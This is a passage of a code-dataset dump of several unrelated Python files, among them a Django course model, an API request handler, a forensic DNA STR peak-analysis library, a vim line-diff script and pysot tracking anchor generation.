errors = pep257.check_files(self._pyfiles)\n if errors:\n print(\"There were errors:\")\n for error in errors:\n print(error)\n self.assertEquals(len(errors), 0)\n\n def testLogbookIsGone(self):\n \"\"\"Make sure we no longer use the name \"logbook\".\n\n \"logbook\" was the early working project name that later became\n \"rewind\".\n\n \"\"\"\n errmsg = \"'{0}' contained 'logbook' although it shouldn't\"\n for pyfile in self._pyfiles:\n if pyfile.endswith('/test_code.py'):\n continue\n with open(pyfile) as f:\n pythoncode = f.read()\n assert \"logbook\" not in pythoncode.lower(), errmsg.format(pyfile)\n\n def test_license_header(self):\n \"\"\"Testing all source files contains license header.\"\"\"\n needle = \"MIT License\"\n for pyfile in self._pyfiles:\n with open(pyfile) as f:\n haystack = f.read()\n msg = \"{0} did not contain license header\"\n self.assertTrue(needle in haystack, msg.format(pyfile))\n","sub_path":"rewind/client/test/test_code.py","file_name":"test_code.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"70534619","text":"from __future__ import unicode_literals\nfrom django.db import models\n\n\nclass CourseManager(models.Manager):\n def course_validator(self, postData):\n errors = {}\n # first_name check\n if len(postData['name']) < 5:\n errors['name'] = 'name has to be more than 5 character'\n if len(postData['desc']) < 15:\n errors['desc'] = 'descriptio has to be more than 15 chars'\n return errors\n\n\nclass Course(models.Model):\n name = models.CharField(max_length=255)\n desc = models.TextField()\n created_at = models.DateTimeField(auto_now_add=True)\n objects = CourseManager()\n \n def repr(self):\n return \"<Course objects: {}, {}, {}>\".format(self.name, self.desc, self.created_at)\n ","sub_path":"Django/courses/main/apps/courses/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"503641560","text":"import requests\nimport datetime as dt\nfrom src.typeDefs.rawPairAnglesCreationResp import RawPairAnglesCreationResp\n\n\nclass RawPairAnglesCreationHandler():\n rawPairAnglesCreationUrl = ''\n\n def __init__(self, rawPairAnglesCreationUrl):\n self.rawPairAnglesCreationUrl = rawPairAnglesCreationUrl\n\n def createRawPairAngles(self, startDate: dt.datetime, endDate: dt.datetime) -> RawPairAnglesCreationResp:\n \"\"\"create raw pair angles using the api service\n\n Args:\n startDate (dt.datetime): start date\n endDate (dt.datetime): end date\n\n Returns:\n RawPairAnglesCreationResp: Result of the raw pair angles creation operation\n \"\"\"\n createRawPairAnglesPayload = {\n \"startDate\": dt.datetime.strftime(startDate, '%Y-%m-%d'),\n \"endDate\": dt.datetime.strftime(endDate, '%Y-%m-%d')\n }\n res = requests.post(self.rawPairAnglesCreationUrl,\n json=createRawPairAnglesPayload)\n\n operationResult: RawPairAnglesCreationResp = {\n \"isSuccess\": False,\n 'status': res.status_code,\n 'message': 'Unable to create raw pair angles...'\n }\n\n if res.status_code == requests.codes['ok']:\n resJSON = res.json()\n operationResult['isSuccess'] = True\n operationResult['message'] = resJSON['message']\n else:\n operationResult['isSuccess'] = False\n try:\n resJSON = res.json()\n operationResult['message'] = resJSON['message']\n except ValueError:\n operationResult['message'] = res.text\n return operationResult\n","sub_path":"src/services/rawPairAnglesCreationHandler.py","file_name":"rawPairAnglesCreationHandler.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"280912568","text":"import math\nimport csv\nimport os, sys\nimport unittest\n\n\nloci = [\"AMEL\", \"D3S1358\", \"D1S1656\", \"D2S441\", \"D10S1248\",\n \"D13S317\", \"Penta E\", \"D16S539\", \"D18S51\", \"D2S1338\", \"CSF1PO\",\n \"Penta D\", \"TH01\", \"vWA\", \"D21S11\", \"D7S820\", \"D5S818\",\n \"TPOX\", \"DYS391\", \"D8S1179\", \"D12S391\", \"D19S433\", \"FGA\", \"D22S1045\"]\n\nchannel_dictionary = {\n \"Sample Name\": \"\", \"AMEL\": \"Blue\", \"D3S1358\": \"Blue\",\n \"D1S1656\": \"Blue\", \"D2S441\": \"Blue\", \"D10S1248\": \"Blue\",\n \"D13S317\": \"Blue\", \"Penta E\": \"Blue\", \"D16S539\": \"Green\",\n \"D18S51\": \"Green\", \"D2S1338\": \"Green\", \"CSF1PO\": \"Green\",\n \"Penta D\": \"Green\", \"TH01\": \"Yellow\", \"vWA\": \"Yellow\",\n \"D21S11\": \"Yellow\", \"D7S820\": \"Yellow\", \"D5S818\": \"Yellow\",\n \"TPOX\": \"Yellow\", \"DYS391\": \"Yellow\", \"D8S1179\": \"Red\",\n \"D12S391\": \"Red\", \"D19S433\": \"Red\", \"FGA\": \"Red\", \"D22S1045\": \"Red\"}\n\n\nclass AlleleUnit:\n\n def __init__(self, allele, locus=None):\n if allele in [\"X\", \"Y\", \"INC\", \"OB\", \"OL\"]:\n self.locusType = \"Character\"\n self.allele = allele\n else:\n self.locusType = \"Number\"\n bps, reps = math.modf(float(allele))\n self.basepairs = round(bps * 10)\n self.repeats = int(reps)\n self.basepairsPerRepeat = self.assign_bp_per_repeat(locus)\n\n self.locus = locus\n\n def assign_bp_per_repeat(self, locus):\n if locus is not None:\n return self.look_up_bp_in_repeat(locus)\n else:\n return 0\n\n nonTetramerDict = {\"Penta D\": 5, \"Penta E\": 5, \"D22S1045\": 3}\n\n def confirm_locus(self, locus):\n return (locus in loci)\n \n def look_up_bp_in_repeat(self, locus):\n if locus in self.nonTetramerDict:\n return self.nonTetramerDict[locus]\n else:\n return 4\n\n def convert_to_bp(self):\n return (self.repeats * self.basepairsPerRepeat) + self.basepairs\n\n def convert_to_repeats(self, repeats):\n return float(str(repeats//self.basepairsPerRepeat)+\".\"+str(repeats%self.basepairsPerRepeat))\n\n def __eq__(self, other):\n return self.__str__() == other.__str__()\n\n def __ne__(self, other):\n return (not self.__eq__(other))\n\n def __lt__(self, other):\n if self.locusType == \"Character\" or other.locusType == \"Character\":\n return self.__str__() < other.__str__()\n else:\n return float(self.__repr__()) < float(other.__repr__())\n\n def __hash__(self):\n return hash(self.__repr__())\n\n def __repr__(self):\n if self.locusType == \"Number\":\n if self.basepairs != 0:\n allele = str(self.repeats)+\".\"+str(self.basepairs)\n else:\n allele = str(self.repeats)\n else:\n allele = self.allele\n return allele\n\n def __str__(self):\n if self.locusType == \"Number\":\n if self.basepairs != 0:\n allele = \"Allele: \"+str(self.repeats)+\".\"+str(self.basepairs)\n else:\n allele = \"Allele: \"+str(self.repeats)\n else:\n allele = \"Allele: \"+self.allele\n return allele\n\n def add(self, other):\n basepairs1 = self.convert_to_bp()\n basepairs2 = other.convert_to_bp()\n totalBasepairs = basepairs1 + basepairs2\n self.repeats = totalBasepairs//self.basepairsPerRepeat\n self.basepairs = totalBasepairs%self.basepairsPerRepeat\n\n def subtract(self, other):\n basepairs1 = self.convert_to_bp()\n basepairs2 = other.convert_to_bp()\n totalBasepairs = basepairs1 - basepairs2\n self.repeats = totalBasepairs//self.basepairsPerRepeat\n self.basepairs = totalBasepairs%self.basepairsPerRepeat\n\n\n\nclass Profile:\n \"\"\"\n The Profile class expects a list of strings.\n The first string is the sample name\n and the rest are the loci as strings.\n It expects comma seperated alleles.\n It accepts profiles as Genotypes or Phenotypes\n it internally converts them to phenotypes.\n \"\"\"\n\n def __init__(self, profilesArray, mixName=None):\n \"\"\"\n Work on this section I am trying to make it so that I can take multiple input profiles\n or just one profile and if multiple combine them, then process the profiles as usual\n if multiple it should get a mixName and apply that to the mixture\n\n mixName should be the same as the mix name in the sample name So that it can be looked up\n as in does mixName appear in sample name in case multiple mixtures are found in a single\n plate of data\n \"\"\"\n\n # I want to throw an error if there are multiple profiles but no mixName\n self.mixName = mixName\n tempProfileArray = []\n if len(profilesArray) > 1:\n tempProfileArray = list(map(\",\".join,zip(*profilesArray)))\n else:\n tempProfileArray = profilesArray[0]\n\n self.sampleName, profileArray = tempProfileArray[0], tempProfileArray[1:]\n if mixName != None:\n self.sampleName = self.mixName\n\n profileArray = [profile.split(',') for profile in profileArray]\n\n profileArray = list(zip(loci, profileArray))\n alleleArray = [[AlleleUnit(allele, locus[0]) for allele in locus[1]]for locus in profileArray]\n alleleArrayToPhenotype = []\n\n for locus in alleleArray:\n tempLocus = list(set(locus))\n tempLocus.sort()\n alleleArrayToPhenotype.append(tempLocus)\n\n self.profile = dict(zip(loci, alleleArrayToPhenotype))\n\n def combineWith(self, other):\n for value in self.profile:\n tempValuesSelf = self.profile[value]\n tempValuesOther = other.profile[value]\n tempValuesSelf.extend(tempValuesOther)\n\n tempValuesSelf = list(set(tempValuesSelf))\n tempValuesSelf.sort()\n if AlleleUnit(\"INC\") in tempValuesSelf and len(tempValuesSelf) > 1:\n tempValuesSelf.remove(AlleleUnit(\"INC\"))\n self.profile[value] = tempValuesSelf\n return self.profile\n\n def __str__(self):\n header = \"Sample Name\\t\"+\"\\t\".join(loci)\n profilePrint = self.sampleName+\"\\t\"\n for locus in loci:\n alleles = self.profile[locus]\n if len(alleles) > 1:\n alleles = [allele.__repr__() for allele in alleles]\n profilePrint = profilePrint+\",\".join(alleles)\n profilePrint = profilePrint+\"\\t\"\n else:\n profilePrint = profilePrint+alleles[0].__repr__()+\"\\t\"\n return header+\"\\n\"+profilePrint+\"\\n\"\n\n\nclass ProfileDB:\n def __init__(self, profileCSVFile):\n tempProfilesList = []\n with open(profileCSVFile, newline='') as data:\n data_reader = csv.reader(data, delimiter='\\t')\n for line in data_reader:\n tempProfilesList.append(line)\n self.profilesHeaderRow = tempProfilesList.pop(0)\n tempProfilesDB = []\n for profile in tempProfilesList:\n tempProfile = Profile([profile])\n tempProfilesDB.append(tempProfile)\n self.profilesDB = tempProfilesDB\n\n def getProfile(self, searchName):\n foundProfile = None\n for profile in self.profilesDB:\n if profile != None and profile.sampleName == searchName:\n foundProfile = profile\n return foundProfile\n\n def addMixes(self, mixFile):\n \"\"\"This takes a list of profiles and turns in into a single profile\n that combines all the profiles; profiles are 25 elements\"\"\"\n\n tempMixArray = []\n\n with open(mixFile, newline='') as data:\n data_reader = csv.reader(data, delimiter='\\t')\n for line in data_reader:\n tempMixArray.append(line)\n numProfiles = len(tempMixArray)\n\n\n\n for x in range(1, numProfiles):\n tempMixProfile = None\n tempMixName = tempMixArray[x][0]+\"-\"+tempMixArray[x][1]\n for y in range(2, 2 + int(tempMixArray[x][1])):\n if tempMixProfile == None:\n tempMixProfile = self.getProfile(tempMixArray[x][y])\n tempMixProfile.sampleName = tempMixName\n else:\n combinedProfile = tempMixProfile.combineWith(self.getProfile(tempMixArray[x][y]))\n tempMixProfile.profile = combinedProfile\n\n if tempMixProfile != None:\n self.profilesDB.append(tempMixProfile)\n\n def __str__(self):\n headerRow = \"\\t\".join(self.profilesHeaderRow)+\"\\n\"\n profileDBString = headerRow\n for profile in self.profilesDB:\n tempProfileString = profile.__str__().split(\"\\n\")[1]\n profileDBString += tempProfileString+\"\\n\"\n return profileDBString\n\n\nclass ReportDB:\n \"\"\" follow the ProfileDB class and pull from the stutter flagger file\n this should make up dictionary of file names that have a list made up\n of all the lines that have that file name\n \"\"\"\n\n def __init__(self, file):\n inputFile = []\n self.fileName = file\n\n with open(self.fileName, newline='') as data:\n data_reader = csv.reader(data, delimiter='\\t')\n for line in data_reader:\n inputFile.append(line)\n\n tempHeaderRow = inputFile.pop(0)\n tempHeaderRow[0] = \"#\"\n tempHeaderRow.append(\"NOC\")\n tempHeaderRow.append(\"Type\")\n\n\n self.reportHeaderRow = tempHeaderRow\n\n\n self.report = inputFile\n\n self.Marker = self.reportHeaderRow.index(\"Marker\")\n self.Dye = self.reportHeaderRow.index(\"Dye\")\n self.Size = self.reportHeaderRow.index(\"Size\")\n self.Allele = self.reportHeaderRow.index(\"Allele\")\n self.Sample_Comments = self.reportHeaderRow.index(\"Sample Comments\")\n self.Height = self.reportHeaderRow.index(\"Height\")\n self.NOC = self.reportHeaderRow.index(\"NOC\")\n self.Program_Output = self.reportHeaderRow.index(\"Type\")\n self.profilesInDB = self.profile_codes()\n self.sampleProperties = self.define_sample_properties()\n\n self.sampleList = self.sample_set()\n self.samplesSorted = self.collect_sample_data()\n self.samplePropertiesDict = self.make_properties_dict()\n\n self.samplePullupDict = self.make_pullup_dict()\n\n def profile_codes(self):\n \"\"\"Takes a list of profiles as lines from the input and splits them\n using the underscore character and takes the sample name. This excludes\n the ladder and the Amp Neg samples. All other samples including the\n Amp Pos sample are added to the set.\"\"\"\n\n \"\"\"Changed to use only manually specified profiles for mixtures \n where samples are not in the file name anymore.\"\"\"\n profilesSet = set()\n for sample in self.report:\n profileCode = sample[1].split(\"_\")[1]\n if profileCode not in ['Allelic Ladder', 'Amp Neg']:\n profilesSet.add(profileCode)\n return profilesSet\n\n def sample_set(self):\n \"\"\"This produces a list of all the samples in the input file\n by file name.\"\"\"\n sampleSet = set()\n for line in self.report:\n sampleSet.add(line[1])\n return sampleSet\n\n def collect_sample_data(self):\n \"\"\"This divides the input file into lists by sample file name.\n This is used to feed the data sample by sample through the application.\"\"\"\n dataBySample = []\n\n for sample in self.sampleList:\n sampleDataOnly = []\n for line in self.report:\n if line[1] == sample:\n sampleDataOnly.append(line)\n dataBySample.append(sampleDataOnly)\n return dataBySample\n\n def make_properties_dict(self):\n propertiesDict = {}\n\n for sample in self.sampleList:\n propertiesDict[sample] = SampleProperties(sample)\n return propertiesDict\n\n def make_pullup_dict(self):\n pullupDict = {}\n\n for sample in self.sampleList:\n pullupDict[sample] = SamplePullup(sample)\n return pullupDict\n\n\n def mark_parent_peaks(self, profilesDB):\n \"\"\"This function marks the parent peaks for the current data set.\n This iterates through the lines of the input and marks parent peaks.\n\n It skips the Amelogenin and DYS391 loci.\n\n It checks for the following issues: overlapping, dropout,\n saturation, and ILS failure. While determining if there is dropout it\n sets the flags if dropout is found.\"\"\"\n for sampleSet in self.samplesSorted:\n sampleName = sampleSet[1][1]\n NOC = 1\n if \"Mix\" in sampleSet[1][1].split(\"_\")[1]:\n name = sampleSet[1][1].split(\"_\")[1]\n if len(sampleSet[1][1].split(\"_\")[2].split(\"-\")) == 1:\n NOC = len(sampleSet[1][1].split(\"_\")[3].split(\"-\"))\n else:\n NOC = len(sampleSet[1][1].split(\"_\")[2].split(\"-\"))\n sampleForData = name+\"-\"+str(NOC)\n elif \"Amp_Pos\" in sampleSet[1][1]:\n sampleForData = \"Amp Pos\"\n elif \"Positive\" in sampleSet[1][1]:\n sampleForData = \"Amp Pos\"\n elif \"Amp_Neg\" in sampleSet[1][1]:\n sampleForData = \"Amp Neg\"\n elif \"Ladder\" in sampleSet[1][1]:\n sampleForData = \"Ladder\"\n else:\n sampleForData = sampleSet[1][1].split(\"_\")[1]\n profileForData = profilesDB.getProfile(sampleForData)\n for peak in sampleSet:\n\n peak.append(str(NOC))\n if peak[self.Marker] != '' and sampleForData not in [\"Ladder\", \"Amp Neg\"] \\\n and peak[self.Sample_Comments] not in \\\n [\"ILS Failure\", \"ILS Fails\", \"Misplating Fails\", \"Size Call Failed\"]:\n currentAllele = AlleleUnit(peak[self.Allele])\n\n if currentAllele in profileForData.profile[peak[self.Marker]]:\n peak.append(\"Par\")\n if peak[self.Dye] == \"Blue\":\n self.samplePullupDict[sampleName].Blue.append(peak[self.Size])\n elif peak[self.Dye] == \"Green\":\n self.samplePullupDict[sampleName].Green.append(peak[self.Size])\n elif peak[self.Dye] == \"Yellow\":\n self.samplePullupDict[sampleName].Yellow.append(peak[self.Size])\n elif peak[self.Dye] == \"Red\":\n self.samplePullupDict[sampleName].Red.append(peak[self.Size])\n\n currentPropDict = self.samplePropertiesDict[sampleName].loci[peak[self.Marker]]\n #self.samplePropertiesDict[sampleName].loci[peak[self.Marker]].Peak_BP.append(peak[self.Size])\n currentPropDict.Peak_BP.append(peak[self.Size])\n #self.samplePropertiesDict[sampleName].loci[peak[self.Marker]].Peak_Profiles.append(peak[self.Allele])\n currentPropDict.Peak_Profiles.append(peak[self.Allele])\n #self.samplePropertiesDict[sampleName].loci[peak[self.Marker]].Channel = peak[self.Channel]\n currentPropDict.Channel = peak[self.Dye]\n\n else:\n peak.append(\"X\")\n\n elif \"Fail\" in peak[self.Sample_Comments]:\n peak.append(\"Fail\")\n else:\n peak.append(\"X\")\n\n\n # Rework the following three functions to work with the current structure of the program\n def in_stutter_position(self, parent, position, allele):\n \"\"\"This function determines if a non-parent peak is in stutter position\n based on allele bin.\"\"\"\n locus = allele[self.Marker]\n if allele[self.Allele] not in [\"OL\"]:\n return AlleleUnit(parent,locus).add(AlleleUnit(position,locus)) == AlleleUnit(allele[self.Allele])\n else:\n return False\n\n def is_loci_of_interest(self, locus):\n \"\"\"Determines if the locus is one of the loci we are analyzing in this\n study only for tetramer locations only. Penta D and E and D22S1045 are\n handled separately.\"\"\"\n return locus not in ['', \"AMEL\"]\n\n def is_allele_markable(self, flagData, peak, peakNumber):\n \"\"\"Determines if the current potential stutter peak is markable\n based on the following criteria.\"\"\"\n return peakNumber in flagData[peak[self.Marker]][\"Called Peaks\"] \\\n and peak[self.Program_Output] == \"X\"\n\n def is_within_bp_range(self, parentPeak, peak, stutterPos):\n \"\"\"Determines if the potential stutter peak is in stutter position\n based on the size of the parent peaks at the locus.\"\"\"\n return ((float(parentPeak) - 0.5) + stutterPos) \\\n <= float(peak[self.Size]) \\\n <= ((float(parentPeak) + 0.5) + stutterPos)\n\n\n def mark_stutter(self, profilesDB):\n \"\"\"\n This function marks all stutter peaks.\n Peaks are labeled db b hb or f followed by the number of the parent peak.\n\n remember that some locations aren't repeats of 4bp\n Penta loci have 5 basepair repeats and D22S1045 has 3 basepair repeats.\n These loci are separated from the tetramer loci.\n\n This function checks flags to determine if the allele can be used.\n \"\"\"\n\n for sampleSet in self.samplesSorted:\n #NOC = -1\n if \"Mix\" in sampleSet[1][1].split(\"_\")[1]:\n name = sampleSet[1][1].split(\"_\")[1]\n NOC = len(sampleSet[1][1].split(\"_\")[2].split(\"-\"))\n sampleForData = name + \"-\" + str(NOC)\n elif \"Amp_Pos\" in sampleSet[1][1]:\n sampleForData = \"Amp Pos\"\n #NOC = 1\n elif \"Ladder\" in sampleSet[1][1]:\n sampleForData = \"Ladder\"\n else:\n sampleForData = sampleSet[1][1].split(\"_\")[1]\n #NOC = 1\n profileForData = profilesDB.getProfile(sampleForData)\n\n for peak in sampleSet:\n #peak[self.NOC] = NOC\n if self.is_loci_of_interest(peak[self.Marker]):\n alleles = self.samplePropertiesDict[sampleSet[1][1]].loci[peak[self.Marker]].Peak_Profiles\n peakSizes = self.samplePropertiesDict[sampleSet[1][1]].loci[peak[self.Marker]].Peak_BP\n for x in range(len(alleles)):\n repeatMultiple = 0\n if peak[self.Marker] not in [\"D22S1045\", \"Penta D\", \"Penta E\"]:\n repeatMultiple = 4\n elif peak[self.Marker] == \"D22S1045\":\n repeatMultiple = 3\n else:\n repeatMultiple = 5\n parentPeak = peakSizes[x]\n parentAllele = alleles[x]\n\n\n\n if self.is_within_bp_range(parentPeak, peak, (repeatMultiple * -1)) \\\n or self.in_stutter_position(parentAllele, -1, peak):\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"b\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output]+\",b\"\n\n elif self.is_within_bp_range(parentPeak, peak, (repeatMultiple * -2)) \\\n or self.in_stutter_position(parentAllele, -2, peak):\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"db\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",db\"\n\n elif repeatMultiple == 4 and (self.is_within_bp_range(parentPeak, peak, (repeatMultiple * -0.5)) \\\n or self.in_stutter_position(parentAllele, -0.2, peak)):\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"hb\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",hb\"\n\n elif self.is_within_bp_range(parentPeak, peak, (repeatMultiple * 1)) \\\n or self.in_stutter_position(parentAllele, 1, peak):\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"f\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",f\"\n\n def mark_pullup(self):\n \"\"\"\n This function takes the pullupList from definePullup and use a test\n \"\"\"\n for sampleSet in self.samplesSorted:\n\n sampleName = sampleSet[1][1]\n\n\n for peak in sampleSet:\n if peak[self.Dye] == \"Blue\":\n for peakSize in self.samplePullupDict[sampleName].Green + self.samplePullupDict[sampleName].Yellow + self.samplePullupDict[sampleName].Red:\n if float(peak[self.Size]) - 0.5 <= float(peakSize) \\\n <= float(peak[self.Size]) + 0.5:\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"pullup\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",pullup\"\n elif peak[self.Dye] == \"Green\":\n for peakSize in self.samplePullupDict[sampleName].Blue + self.samplePullupDict[sampleName].Yellow + self.samplePullupDict[sampleName].Red:\n if float(peak[self.Size]) - 0.5 <= float(peakSize) \\\n <= float(peak[self.Size]) + 0.5:\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"pullup\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",pullup\"\n elif peak[self.Dye] == \"Yellow\":\n for peakSize in self.samplePullupDict[sampleName].Blue + self.samplePullupDict[sampleName].Green + self.samplePullupDict[sampleName].Red:\n if float(peak[self.Size]) - 0.5 <= float(peakSize) \\\n <= float(peak[self.Size]) + 0.5:\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"pullup\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",pullup\"\n elif peak[self.Dye] == \"Red\":\n for peakSize in self.samplePullupDict[sampleName].Blue + self.samplePullupDict[sampleName].Green + self.samplePullupDict[sampleName].Yellow:\n if float(peak[self.Size]) - 0.5 <= float(peakSize) \\\n <= float(peak[self.Size]) + 0.5:\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"pullup\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",pullup\"\n\n\n def write_output(self):\n outputFileName = self.fileName.rsplit('.', 1)[0]\n\n outputFile = open(outputFileName + \"_newoutput.tsv\", \"w\")\n outputFile.write(\"\\t\".join(self.reportHeaderRow)+\"\\n\")\n for line in self.report:\n outputFile.write(\"\\t\".join(line)+\"\\n\")\n outputFile.close()\n\n\n def define_sample_properties(self):\n return {0: 0}\n\n\n def __str__(self):\n headerRow = \"\\t\".join(self.reportHeaderRow)+\"\\n\"\n reportDBString = headerRow\n for line in self.report:\n tempReportString = \"\\t\".join(line)\n reportDBString += tempReportString+\"\\n\"\n return reportDBString\n\n\nclass LocusProperties:\n def __init__(self):\n\n self.Channel = \"\"\n self.Saturation = False\n self.Drop_Out = False\n self.Peak_BP = []\n self.Peak_Profiles = []\n\n def __str__(self):\n return \"Channel: \"+self.Channel+\"\\n\"+\"Saturation: \"+str(self.Saturation)+\"\\n\"+\\\n \"Drop out: \"+str(self.Drop_Out)+\"\\n\"+\"Peak Profiles: \"+str(self.Peak_Profiles)+\"\\n\"+\\\n \"Peak BP: \"+str(self.Peak_BP)+\"\\n\"\n\n\nclass SampleProperties:\n def __init__(self, sampleName):\n self.sampleName = sampleName\n\n self.loci = {\n \"AMEL\": LocusProperties(), \"D3S1358\": LocusProperties(), \"D1S1656\": LocusProperties(),\n \"D2S441\": LocusProperties(), \"D10S1248\": LocusProperties(), \"D13S317\": LocusProperties(),\n \"Penta E\": LocusProperties(), \"D16S539\": LocusProperties(), \"D18S51\": LocusProperties(),\n \"D2S1338\": LocusProperties(), \"CSF1PO\": LocusProperties(), \"Penta D\": LocusProperties(),\n \"TH01\": LocusProperties(), \"vWA\": LocusProperties(), \"D21S11\": LocusProperties(),\n \"D7S820\": LocusProperties(), \"D5S818\": LocusProperties(), \"TPOX\": LocusProperties(),\n \"DYS391\": LocusProperties(), \"D8S1179\": LocusProperties(), \"D12S391\": LocusProperties(),\n \"D19S433\": LocusProperties(), \"FGA\": LocusProperties(), \"D22S1045\": LocusProperties()}\n\n def __str__(self):\n\n\n outputString = \"\"\n for locus in self.loci:\n outputString += locus\n outputString += \"\\n\"\n outputString += self.loci[locus].__str__()\n\n\n return \"Sample name: \"+self.sampleName+\"\\n\"+outputString\n\nclass SamplePullup:\n \"\"\"\n This function takes the flagdata at the \"Peak BP\" location for\n all keys in dictionary and makes a set of those data points in\n case any overlap this list is passed to the next function to filter\n the all called peaks\n \"\"\"\n\n def __init__(self, sampleName):\n self.sampleName = sampleName\n self.Blue = []\n self.Green = []\n self.Yellow = []\n self.Red = []\n\n def __str__(self):\n blue = \"\\, \".join(self.Blue)+\"\\n\"\n green = \"\\, \".join(self.Green)+\"\\n\"\n yellow = \"\\, \".join(self.Yellow)+\"\\n\"\n red = \"\\, \".join(self.Red)+\"\\n\"\n return \"Pullup BP: \"+\"\\n\"+blue+green+yellow+red\n\n\nclass TestAlleleUnit(unittest.TestCase):\n\n def test_microvariant(self):\n self.assertFalse(AlleleUnit(14.1, \"TPOX\") == AlleleUnit(14, \"TPOX\"))\n self.assertFalse(AlleleUnit(11.3, \"TPOX\") == AlleleUnit(11.2, \"TPOX\"))\n self.assertTrue(AlleleUnit(10, \"TPOX\") == AlleleUnit(10.0, \"TPOX\"))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"strlibrary.py","file_name":"strlibrary.py","file_ext":"py","file_size_in_byte":26882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"571040085","text":"import vim\nimport sys\ns1 = sys.argv[0]\ns2 = sys.argv[1]\ns3 = [str(i + 1) for i in xrange(len(s1)) if s1[i] != s2[i]]\nvim.command(\"hi ColorColumn ctermbg=lightblue ctermfg=darkred\" )\ns4 = \"set colorcolumn=\" + \",\".join(s3)\ns5 = vim.eval(\"&colorcolumn\")\nif(\",\".join(s3) == s5):\n vim.command(\"set colorcolumn=\")\nelse:\n vim.command(s4)\n","sub_path":"bundle/2linediff/twolinediffcomp.py","file_name":"twolinediffcomp.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"166389903","text":"# Copyright (c) SenseTime. All Rights Reserved.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport math\n\nimport numpy as np\n\nfrom pysot.utils.bbox import corner2center, center2corner\n\n\nclass Anchors:\n \"\"\"\n This class generate anchors.\n \"\"\"\n def __init__(self, stride, ratios, scales, image_center=0, size=0):\n self.stride = stride\n self.ratios = ratios\n self.scales = scales\n self.image_center = image_center\n # size of the rpn output\n # siamrpn++: 25, siamrpn: 17\n self.size = size\n # typically, anchor_num = 5\n self.anchor_num = len(self.scales) * len(self.ratios)\n\n self.anchors = None\n\n self.generate_anchors()\n\n def generate_anchors(self):\n \"\"\"\n generate anchors based on predefined configuration\n \"\"\"\n # Generate the bbox center on (0,0),the bbox_num = anchor_num\n # anchor_num = len(anchor_ratios)*len(anchor_scales)\n self.anchors = np.zeros((self.anchor_num, 4), dtype=np.float32)\n size = self.stride * self.stride\n count = 0\n for r in self.ratios:\n ws = int(math.sqrt(size*1. / r))\n hs = int(ws * r)\n\n for s in self.scales:\n w = ws * s\n h = hs * s\n self.anchors[count][:] = [-w*0.5, -h*0.5, w*0.5, h*0.5][:]\n count += 1\n\n def generate_all_anchors(self, im_c, size):\n \"\"\"\n im_c: image center\n size: image size\n \"\"\"\n if self.image_center == im_c and self.size == size:\n return False\n # 127\n self.image_center = im_c\n # 25\n self.size = size\n # To calculate the position of the first anchor's\n # coordinate in the search_region.\n\n # The meaning of anchor.stride:The distance in the\n # search region of the corresponding adjacent anchor\n\n # Assuming the center of search region just is the\n # center of the feature map(generated by backbone like resnet 50),\n # the corresponding center can be calculated \n # cx = search_region_center_coordinate -\n # floor(feature_map.shape(0)/2)*self.stride\n\n # the origin of the coordinate: the top left corner \n # of the search region\n a0x = im_c - size // 2 * self.stride\n ori = np.array([a0x] * 4, dtype=np.float32)\n # zero_anchors.shape = (5,4)\n zero_anchors = self.anchors + ori\n # x1.shape = (5,1)\n x1 = zero_anchors[:, 0]\n y1 = zero_anchors[:, 1]\n x2 = zero_anchors[:, 2]\n y2 = zero_anchors[:, 3]\n #x1.shape = (5,1,1)\n x1, y1, x2, y2 = map(lambda x: x.reshape(self.anchor_num, 1, 1),\n [x1, y1, x2, y2])\n cx, cy, w, h = corner2center([x1, y1, x2, y2])\n # disp_x.shape=(1,1,25)\n disp_x = np.arange(0, size).reshape(1, 1, -1) * self.stride\n disp_y = np.arange(0, size).reshape(1, -1, 1) * self.stride\n # cx.shape(5,1,25)\n cx = cx + disp_x\n cy = cy + disp_y\n\n # broadcast\n # zero.shape=(5,25,25)\n zero = np.zeros((self.anchor_num, size, size), dtype=np.float32)\n # cx.shape=(5,25,25)\n cx, cy, w, h = map(lambda x: x + zero, [cx, cy, w, h])\n x1, y1, x2, y2 = center2corner([cx, cy, w, h])\n\n self.all_anchors = (np.stack([x1, y1, x2, y2]).astype(np.float32),\n np.stack([cx, cy, w, h]).astype(np.float32))\n # all_anchors[0].shape = (4,anchor_num,W,H), the bbox coordinate(in the search region)\n # all_anchors[1].shape = (4,anchor_num,W,H),same content,but in the center format \n return True\n","sub_path":"pysot/utils/anchor.py","file_name":"anchor.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"59739848","text":"def check(x):\n x = bin(x)\n x = x[2:]\n dcount = 0\n rcount = 0\n# print(len(x))\n for item in x:\n if item == \"0\": dcount = dcount + 1\n if item == \"1\": rcount = rcount + 1\n if dcount == 20 and rcount == 